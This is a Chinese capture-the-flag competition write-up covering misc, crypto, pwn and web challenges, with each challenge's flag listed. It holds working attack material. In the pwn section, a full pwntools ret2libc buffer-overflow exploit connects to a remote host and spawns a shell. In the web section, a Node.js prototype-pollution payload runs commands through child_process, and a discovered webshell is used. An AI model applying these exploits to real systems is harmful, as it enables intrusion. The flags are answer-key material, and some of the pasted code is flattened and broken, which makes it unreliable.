免责声明
❝
由于传播、利用本公众号“隼目安全”所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号“隼目安全“及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉谢谢!
【MISC】
签到漫画
每一页漫画最后都有一张二维码拼图用qq钉在桌面
解析二维码
http://weixin.qq.com/r/4BIrMz7ES2M0rXpQ90fy?flag{youthful_and_upward}
flag{youthful_and_upward}*
【删除后门用户2】
这里先登录容器,读取passwd的内容
看到了backdoor:x:0:1000::/home/backdoor:/sbin/nologin用户
userdel发现被进程占用,kill发现没有此进程,于是我多执行了几次
发现这个后门用户每隔五秒就会复活,而且进程不一样,那么我们就去找他的父进程
看到这个可疑进程sleep 5 但是一直在变,挨个杀了一遍,发现Pid22是他的父进程
接下来就可以userdel -f backdoor了
读取flag
flag{943f9194-97a1-497f-80ef-0fbe530acfa9}
【white】附件下载下来,010打开
Gif头,将后缀修改打开,看到第二帧
flag{passion_is_the_greatest_teacher}
【Crypto】
Classics
这里可以看到附件给出了密文和加密过程
先base32编码,然后base64编码,然后rot13回转3位,然后Atbash
cipher,最后Vigenère Encode(key为GAMELAB)将他反向解密这里rot13回转3位,那么我们解密就是回转26-3=23位
flag{2834d185-a1da-4fb1-8bac-59076eb6a634}
【AliceAES】
根据提示得知使用AES在CBC模式下加密消息,并将加密结果以HEX格式与Bob分享。
获取key和iv
加密
得到8995bee3173bb5ede17be5cfc58d762c 提交Ciphertext
Result: flag{6e80563b-21b2-4a70-a809-ec0893c18ccb}
【easymath】
首先通过dp的条件计算有效的素数p
from gmpy2 import next_prime
def count_valid_sequences(length):
# dp[i] 表示长度为 i 的序列的状态计数
dp = [{} for _ in range(length + 1)]
# 初始化 dp[1],只有一个有效状态 1 (即序列以1结尾) dp[1][1] = 1
# 动态规划计算
for i in range(1, length): for state in dp[i]: for next_bit in [0, 1]:
# 计算新的状态
new_state = ((state << 1) & 0b111) | next_bit if i >= 3: # 从第三个位置开始检查
full_seq = ((state << 1) | next_bit) # 如果状态是 0b1111 或 0b0000,跳过 if full_seq == 0b1111 or full_seq == 0:
continue
# 更新 dp[i + 1] 中新的状态计数
dp[i + 1][new_state] = dp[i +
1].get(new_state, 0) + dp[i][state]
# 计算有效的序列数量
result = 0 for state in dp[length]:
# 只计算以 1 结尾的状态 if state & 1:
result += dp[length][state]
return result
# 计算有效序列数量
l = 2331 key = count_valid_sequences(l)
print(f'有效序列数量: {key}')
# 计算下一个素数 p
p = next_prime(key) print(f'下一个素数 p: {p}')
下一个素数 p:
24440283427735860782323152407294917357529111353275570975703531438440519660225708967888657253
64427800078326382055838870159237061508814094709689813408133059130198436029031864197061748902 16267523608158858125831762518730312396384937620710475882976270322032939857089942188526628386 40238623254740905447146670999830187552717802257362427107073858485019955606331947972091793616
37334782511960032885588524607289079855161653463624702398395903704647522936182554978084504934
17191451790994526255238552591985818658552348031882988499108633770981401584062453996779125024
44220011884063994451182221171275547685147549629637310805120817903
接下来把p丢给GPT计算flag
from Crypto.Util.number import * from sympy import mod_inverse
n =
73924384727538970947206738782748412022249401359007414098539978756259452928659700377710511
58654467959088190366787004601419508756536953313691633617571575653775317217487440879008815
82744902312177979298217791686598853486325684322963787498115587802274229739619528838187967
52724136607643815469705655054980069152879413631885647588463251163040382282573829977601839
00795777284127765353670416321225656390361042716724974185095147813048105855036732263242383
96489752427801699815592314894581630994590796084123504542794857800330419850716997654738103
61572579462902977542117051551206301999476105189159737885969832065108318996990529796314096
63293787233730715907972031698300694285035447615846941317952431151460005647921004712595944
88081571644541077283644666700962953460073953965250264401973080467760912924607461783312953
41903808462680967580799546324407398497994274028974114750474171503983034148869696097750242
37020977095640684784772841616459572939086139359740366430299714911021573212385255963488073
95784120585247899369773609341654908807803007460425271832839341595078200327677265778582728
99405892038772118170810589407611005785832499441703500407623441818615634041316915434481458
2980205732305163274822509982340820301144418789572738830713925750250925049059
c =
22904374679367488902465353300670129630835192674576984280263638409475937974030053427830212
32220148179115800064218476071230498161038853658515354817162366883306001138993453468720128
70482410945158758991441294885546642304012025685141746649427132063040233448959783730507539 96444571178920394847892775496841448421745192959036425282303443673614893670752649142713491
08176762928659108992563359780841338853017766381899697166844478862725263715964383626013087
65248327164568010211340540749408337495125393161427493827866434814073414211359223724290251 54532457850154264376745607274824509953826812174161664594250370079644126955657576925020833
35518201506402365037653769328964792384357398658050599085328317415881669906104067813195389
95712584992928490839557809170189205452152534029118700150959965267557712569942462430810977 05956507729095203175152835795712433916956254938660002429833440749825717257897155925332817 93574438414274299040130900620974832221259307423227944508737597199779811712219264399857869
44884991660612824458339473263174969955453188212116242701330480313264281033623774772556593
17443851010149159666718735682793529625647033826947276978177857696413096776189735784748761
2475534606977433259616857569013270917400687539344772924214733633652812119743 e = 65537
p =
24440283427735860782323152407294917357529111353275570975703531438440519660225708967888657
25364427800078326382055838870159237061508814094709689813408133059130198436029031864197061
74890216267523608158858125831762518730312396384937620710475882976270322032939857089942188
52662838640238623254740905447146670999830187552717802257362427107073858485019955606331947
97209179361637334782511960032885588524607289079855161653463624702398395903704647522936182
55497808450493417191451790994526255238552591985818658552348031882988499108633770981401584
06245399677912502444220011884063994451182221171275547685147549629637310805120817903
q = n // p
phi_n = (p - 1) * (q - 1) d = mod_inverse(e, phi_n) woshim = pow(c, d, n)
flag = long_to_bytes(woshim).decode()
if flag.startswith("FLAG{"):
print("The flag starts with 'FLAG{'") elif len(flag) > 100:
print("The flag is longer than 100 characters") else:
print("The flag is:", flag)
flag{77310934-21fa-4ee4-a783-dc1865ebab28}
【PWN】
clock_in
先丢ida看一眼,进入mian函数,F5查看伪代码
进去查看get_info()函数
fgets读取超过s数组大小的输入。没有对输入大小进行检查,是一个典型的缓冲区溢出利用思路
用了缓冲区溢出漏洞来覆盖返回地址,然后调用puts函数,通过将GOT中puts 的地址传递给puts函数,获取puts的实际地址,以此来推算出libc的基地址然后找到system和/bin/sh的地址最后利用计算得到的地址并调用system函数来执行shell
Payload:
from pwn import *
context(log_level="debug") # 设置调试级别,以便输出调试信息 r = remote("39.106.48.123", 27711) # 连接到远程服务
# 定义程序中重要地址
putsdepltdizi = 0x401060 # puts 函数的 PLT 地址 puts_got = 0x403FD8 # puts 函数的 GOT 地址
pop_rdi = 0x4011C5 # pop rdi; ret; 的地址,用于设置函数参数
ret = 0x4011C9 # ret 指令的地址
bufchangdu = 72 # 缓冲区偏移量,确定返回地址的位置 huishouzhi = 0x401090 # 返回到的地址
# 创建第一个 payload
payload = cyclic(bufchangdu) + p64(pop_rdi) + p64(puts_got) + p64(putsdepltdizi) + p64(huishouzhi)
# 接收 "Your info: n" 提示,发送 payload r.recvuntil("Your info: n")
r.sendline(payload)
# 接收 puts 的地址并解析
puts_addr = u64(r.recvuntil(b'x7f')[-6:].ljust(8, b'x00')) # 读取 puts 地址 success("puts_libc-->" + hex(puts_addr))
# 加载 libc,以便计算 system 和 "/bin/sh" 的地址
libc = ELF("./libc.so.6")
jibenchmark = puts_addr - libc.symbols["puts"] # 计算 libc 基地址 xitong = jibenchmark + libc.symbols["system"] # 计算 system 函数地址 binsh = jibenchmark + next(libc.search(b"/bin/sh")) # 找到 "/bin/sh" 字符串地址
# 创建第二个 payload
payload = b'A' * bufchangdu + p64(pop_rdi) + p64(binsh) + p64(ret) + p64(xitong) + p64(0xDEADBEED)
# 发送第二个 payload
r.send(payload)
# 进入交互模式
r.interactive()
根据提示来到/home/ctf目录下读取flag
flag{d919441c-3a49-4585-b174-9ddb1a9652be}
【WEB】
ezGetFlag
F12
发现backend.php
GET请求方式错误,尝试post
flag{3ae3e580-f404-4f99-9f5f-8641f39ea537}
【ezFindShell】
先丢入Seay源代码市计系统,正则搜POST,GET等关键字(vscode用ctrl+shift+f也行)
发现可疑文件/1de9d9a55a824f4f8b6f37af76596baa.php
审计发现_POST[‘POST’]接收传入名为POST的参数于是可以将system编码后通过GET e参数传入然后将命令通过POST的POST参数传入
flag{bc7ee4c8-b113-4805-9593-348a3ecb795d}
【cyberboard】
这道题考的是node.js原型链污染的AST注入首先下载附件
VScdode Ctrl+shift+f搜索password
得知用户名为admin
密码为password_you_don’t_know 登录后来到messages
从网上找到一篇文章参考AST注入-从原型链污染到RCE_[湖湘杯 2021 final]vote-CSDN博客我这里直接复制他的payload稍微修改后尝试利用(文件写入路径可在源码中得知)
报错了
重启容器,将execSync改成exec
{"__proto__":{"block":{ "type":"Text",
"line":"process.mainModule.require('child_process').exec('cat /f* >>
/app/public/js/sunmuteam.txt')"}}}
flag{b982846a-3046-4510-bd2e-3025720b902e}
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
暂无评论内容